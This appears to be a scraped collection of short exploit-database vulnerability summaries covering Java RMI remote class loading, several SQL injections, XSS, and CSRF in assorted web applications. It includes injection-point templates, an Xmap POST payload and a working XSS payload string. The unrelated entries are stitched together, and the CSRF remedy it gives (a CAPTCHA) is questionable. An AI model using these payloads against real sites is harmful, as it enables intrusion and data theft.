This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.
This vulnerability affects Malaysian CMS sites. It is exploitable by sending malicious SQL queries to the vulnerable parameter 'id' in the URL http://127.0.0.1//path/news_body.php?id=[sqli].
Input passed via the 'lang_code' GET parameter to index.php and login.php in '/www/core/language.class.php', and 'login' POST parameter to login.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Input passed via the 'subject', 'name', 'email' and 'body' parameters to 'contact_us.php' script is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
Versions prior to 2.9.4 suffer from a blind sql injection in both the 'tag' and 'letter' parameters. The request MUST reach the site with these parameters urlencoded for the injection to succeed.
Input passed via multiple parameters to multiple scripts is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
LiteRadius is vulnerable to multiple Blind SQL Injection vulnerabilities. Attackers can exploit these vulnerabilities by sending maliciously crafted requests to the vulnerable application. This can allow attackers to gain access to sensitive information stored in the database, such as usernames and passwords. The PoC provided shows how an attacker can exploit this vulnerability by sending a maliciously crafted request to the vulnerable application.
Versions prior to 1.2.12 suffer from a blind sql injection in the 'view' parameter, depending on Xmap's internal cache settings. POSTDATA: option=com_xmap&tmpl=component&Itemid=999&view=[SQL] 1.2.12 has been patched. Older versions with cache=off cannot be exploited in this fashion.
In the page of 'http://127.0.0.1/pandora_console/index.php?sec=usuarios&sec2=operation/users/user_edit' we can submit the parameters : password_new ; password_conf ; phone ; fullname ; e-mail with POST request. We can exploit it by sending crafted html page to the administrator (The connected privileged user) with customized values. To patch this vulnerability the developpers must integrate an anti-bot system like CAPTCHA in the application.
Attackers can use Authentication Bypass to get into Admin Panel in the site. Reflected XSS Vulnerability in admin panel(search field) Exploit: ">><marquee><h1>XSSed_by_r007k17</h1></marquee>
Services By CQR